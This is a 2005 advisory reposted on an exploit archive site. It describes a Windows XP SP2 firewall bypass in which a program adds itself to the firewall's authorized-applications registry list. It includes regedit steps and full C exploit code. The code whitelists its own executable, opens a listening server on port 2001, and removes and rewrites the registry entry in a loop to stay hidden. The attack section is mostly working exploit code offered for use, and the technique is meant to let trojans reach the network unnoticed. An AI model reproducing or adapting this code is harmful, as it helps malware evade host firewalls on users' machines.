首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Windows XP Firewall Bypassing
来源:http://taekwondo-itf.szm.sk 作者:Mark 发布时间:2005-09-14  

Windows XP Firewall Bypassing (Registry Based)

Summary
Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.

Credit:
The information has been provided by Mark Kica.
The original article can be found at: http://taekwondo-itf.szm.sk/bugg.zip

Details
Vulnerable Systems:
* Microsoft Windows XP SP2

Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.

If an attacker adds a new key to the registry address of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List, the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.

Proof of Concept:
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List

Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat

Exploit:
#include <stdio.h>
#include <windows.h>
#include <ezsocket.h>
#include <conio.h>
#include "Shlwapi.h"

int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];

HKEY hKey;
int i;

GetModuleFileName(NULL, filename, 1024);

strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");

RegOpenKeyEx(

HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);

RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;

fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
fprintf(stdout, "Dedicated to Katka H. from Levoca \n");

sleep(3);

if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;

for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);

if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
fprintf(stdout, "Sended: Hello World\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

if (!strcmp(buffer, "quit"))
break;
}

ezsocket_exit();
return 0;
}

/* EoF */



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·COOL! Remote Control DoS
·Mercury Mail Multiple Buffer O
·Snort <= 2.4.0 SACK TCP Opt
·Zebedee DoS
·Raxnet Cacti graph_image.php R
·Counter Strike 2D DoS
·GNU Mailutils imap4d search Co
·VisualBoy Advanced Local Buffe
·USB Lock Auto-Protect Locally
·BNBT EasyTracker DoS
·ZipTorrent Local Information D
·CuteNews Code Execution
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved